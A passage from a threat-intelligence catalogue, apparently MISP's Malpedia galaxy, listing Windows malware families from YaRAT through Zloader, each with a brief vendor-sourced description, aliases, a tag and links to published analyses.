https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://twitter.com/CryptoInsane/status/1586967110504398853

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware

https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang

https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/

https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/

https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/

YaRAT

According to PTSecurity, this RAT uses Yandex Disk as a C2.

The tag is: misp-galaxy:malpedia="YaRAT"

YaRAT is also known as:

Table 5030. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks

Yarraq

Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.

The tag is: misp-galaxy:malpedia="Yarraq"

Yarraq is also known as:

Table 5031. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq

https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview

https://twitter.com/GrujaRS/status/1210541690349662209

Yasso

According to Palo Alto Networks, Yasso is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. It is authored by a Mandarin-speaking pentester nicknamed Sairson.

The tag is: misp-galaxy:malpedia="Yasso"

Yasso is also known as:

Table 5032. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yasso

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

Yatron

The tag is: misp-galaxy:malpedia="Yatron"

Yatron is also known as:

Table 5033. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron

https://securelist.com/ransomware-two-pieces-of-good-news/93355/

YoungLotus

Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.

PE timestamps suggest that it came into existence in the second half of 2014.

Some versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).

The tag is: misp-galaxy:malpedia="YoungLotus"

YoungLotus is also known as:

  • DarkShare

Table 5038. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus

https://www.youtube.com/watch?v=AUGxYhE_CUY

YourCyanide

According to Trend Micro, this is a ransomware written as a Windows commandline script, with obfuscation applied.

The tag is: misp-galaxy:malpedia="YourCyanide"

YourCyanide is also known as:

  • GonnaCope

  • Kekpop

  • Kekware

Table 5039. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.your_cyanide

https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html

YTStealer

According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it’s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.

The tag is: misp-galaxy:malpedia="YTStealer"

YTStealer is also known as:

Table 5040. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer

https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

Yunsip

W32/Yunsip!tr.pws is classified as a password stealing trojan. Password Stealing Trojan searches the infected system for passwords and send them to the hacker.

The tag is: misp-galaxy:malpedia="Yunsip"

Yunsip is also known as:

Table 5042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yunsip

https://www.fortiguard.com/encyclopedia/virus/3229143

Z3

Ransomware.

The tag is: misp-galaxy:malpedia="Z3"

Z3 is also known as:

  • Z3enc Ransomware

Table 5043. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.z3

https://id-ransomware.blogspot.com/2020/08/z3-ransomware.html

Zacinlo

Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.

The tag is: misp-galaxy:malpedia="Zacinlo"

Zacinlo is also known as:

  • s5mark

Table 5044. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo

https://labs.bitdefender.com/wp-content/uploads/downloads/six-years-and-counting-inside-the-complex-zacinlo-ad-fraud-operation/

Zebrocy

According to brandefense, Zebrocy is malware that falls into the Trojan category, which the threat actor group APT28/Sofacy has used since 2015. Zebrocy malware consists of 3 main components; Backdoor, Downloader, and Dropper. The Downloader and Dropper take responsibility for discovery processes and downloading the main malware on the systems. At the same time, Backdoor undertakes the duties such as persistence in the system, espionage, and data extraction.

This malware, which is not considered new, has variants in many languages from the past to the present. These include programming languages such as Delphi, C#, Visual C++, VB.net, and Golang. Furthermore, we know advanced threat actors and groups revise their malicious software among their toolkits at certain time intervals using different languages and technologies.

The tag is: misp-galaxy:malpedia="Zebrocy"

Zebrocy is also known as:

  • Zekapab

Table 5045. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/

https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/

https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://meltx0r.github.io/tech/2019/10/24/apt28.html

https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware

https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html

https://securelist.com/zebrocys-multilanguage-malware-salad/90680/

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://research.checkpoint.com/malware-against-the-c-monoculture/

https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://securelist.com/greyenergys-overlap-with-zebrocy/89506/

https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/

https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/

https://brandefense.io/zebrocy-malware-technical-analysis-report/

https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og

https://securelist.com/a-zebrocy-go-downloader/89419/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.secureworks.com/research/threat-profiles/iron-twilight

https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

https://unit42.paloaltonetworks.com/atoms/fighting-ursa/

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html

Zedhou

The tag is: misp-galaxy:malpedia="Zedhou"

Zedhou is also known as:

Table 5047. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou

zenar

The tag is: misp-galaxy:malpedia="zenar"

zenar is also known as:

Table 5048. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar

https://twitter.com/3xp0rtblog/status/1387996083712888832?s=20

Zeoticus

The tag is: misp-galaxy:malpedia="Zeoticus"

Zeoticus is also known as:

Table 5049. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus

https://labs.sentinelone.com/zeoticus-2-0-ransomware-with-no-c2-required/

Zeppelin

Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.

The tag is: misp-galaxy:malpedia="Zeppelin"

Zeppelin is also known as:

Table 5050. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://community.riskiq.com/article/47766fbd

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-223a

https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/

https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/

https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team_Zeppelin_Ransomware_Analysis.pdf

https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

ZeroCleare

ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk’s partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.

The tag is: misp-galaxy:malpedia="ZeroCleare"

ZeroCleare is also known as:

Table 5052. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.ibm.com/downloads/cas/OAJ4VZNJ

https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

ZeroEvil

ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.

It first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=). So far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.

The ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).

The tag is: misp-galaxy:malpedia="ZeroEvil"

ZeroEvil is also known as:

Table 5053. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil

https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/

ZeroLocker

The tag is: misp-galaxy:malpedia="ZeroLocker"

ZeroLocker is also known as:

Table 5054. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker

http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html

Zeropadypt

The tag is: misp-galaxy:malpedia="Zeropadypt"

Zeropadypt is also known as:

  • Ouroboros

Table 5055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeropadypt

https://www.pcrisk.com/removal-guides/16844-harma-ouroboros-ransomware

ZeroT

The tag is: misp-galaxy:malpedia="ZeroT"

ZeroT is also known as:

Table 5056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

Zeus

According to CrowdStrike, The two primary goals of the Zeus trojan horse virus are stealing people’s financial information and adding machines to a botnet. Unlike many types of malware, most Zeus variants try to avoid doing long-term damage to the devices they infect. Their aim is to avoid detection from antivirus software.

The tag is: misp-galaxy:malpedia="Zeus"

Zeus is also known as:

  • Zbot

Table 5057. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus

https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

http://eternal-todo.com/blog/detecting-zeus

http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html

https://nakedsecurity.sophos.com/2010/07/24/sample-run/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20

https://www.mnin.org/write/ZeusMalware.pdf

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.secureworks.com/research/zeus?threat=zeus

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

http://eternal-todo.com/blog/zeus-spreading-facebook

http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf

https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/

https://www.crowdstrike.com/cybersecurity-101/malware/trojan-zeus-malware

https://www.wired.com/2017/03/russian-hacker-spy-botnet/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.s21sec.com/en/zeus-the-missing-link/

https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.secureworks.com/research/threat-profiles/gold-evergreen

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://www.secureworks.com/research/threat-profiles/bronze-woodland

https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/

http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html

http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html

http://eternal-todo.com/blog/new-zeus-binary

http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html

http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html

http://www.secureworks.com/research/threat-profiles/gold-evergreen

http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html

ZeusAction

The tag is: misp-galaxy:malpedia="ZeusAction"

ZeusAction is also known as:

Table 5058. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action

https://twitter.com/benkow_/status/1136983062699487232

https://www.youtube.com/watch?v=EyDiIAtdI

Zeus MailSniffer

The tag is: misp-galaxy:malpedia="Zeus MailSniffer"

Zeus MailSniffer is also known as:

Table 5059. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer

Zeus OpenSSL

This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.

In June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB. In January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase") - 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB) - 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB) - 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus OpenSSL"

Zeus OpenSSL is also known as:

  • XSphinx

Table 5060. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl

https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/

https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/

https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/

Zeus Sphinx

This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9. Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase") - 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB) - 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB) - 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus Sphinx"

Zeus Sphinx is also known as:

Table 5061. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx

https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/

https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/

https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html

Zezin

The tag is: misp-galaxy:malpedia="Zezin"

Zezin is also known as:

Table 5062. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin

https://twitter.com/siri_urz/status/923479126656323584

zgRAT

zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.

The tag is: misp-galaxy:malpedia="zgRAT"

zgRAT is also known as:

Table 5063. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities

https://bazaar.abuse.ch/browse/signature/zgRAT/

https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US

https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/

ZingoStealer

An information stealer written in .NET.

The tag is: misp-galaxy:malpedia="ZingoStealer"

ZingoStealer is also known as:

  • Ginzo

Table 5066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zingo_stealer

https://blog.talosintelligence.com/haskers-gang-zingostealer/

https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer

ZitMo

The tag is: misp-galaxy:malpedia="ZitMo"

ZitMo is also known as:

  • ZeuS-in-the-Mobile

Table 5067. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo

https://mobisec.reyammer.io/slides

https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/

ZiyangRAT

The tag is: misp-galaxy:malpedia="ZiyangRAT"

ZiyangRAT is also known as:

Table 5068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Zloader

This family describes the (initially small) loader, which downloads Zeus OpenSSL.

In June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (→ Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded. The initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

The tag is: misp-galaxy:malpedia="Zloader"

Zloader is also known as:

  • DELoader

  • Terdot

Table 5069. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader

https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/

https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/

https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf

https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/

https://johannesbader.ch/blog/the-dga-of-zloader/

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/

https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html

https://www.youtube.com/watch?v=mhX-UoaYnOM

https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries

https://unit42.paloaltonetworks.com/api-hammering-malware-families/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/

https://www.lac.co.jp/lacwatch/people/20201106_002321.html

https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/

https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/

https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit

https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/

https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance

https://twitter.com/VK_Intel/status/1294320579311435776

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/

https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/

https://noticeofpleadings.com/zloader/

https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems

https://labs.k7computing.com/?p=22458

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/

https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed

https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/

https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/

https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://blogs.quickheal.com/zloader-entailing-different-office-files/

https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/

https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1

https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/

https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks

https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html

https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns

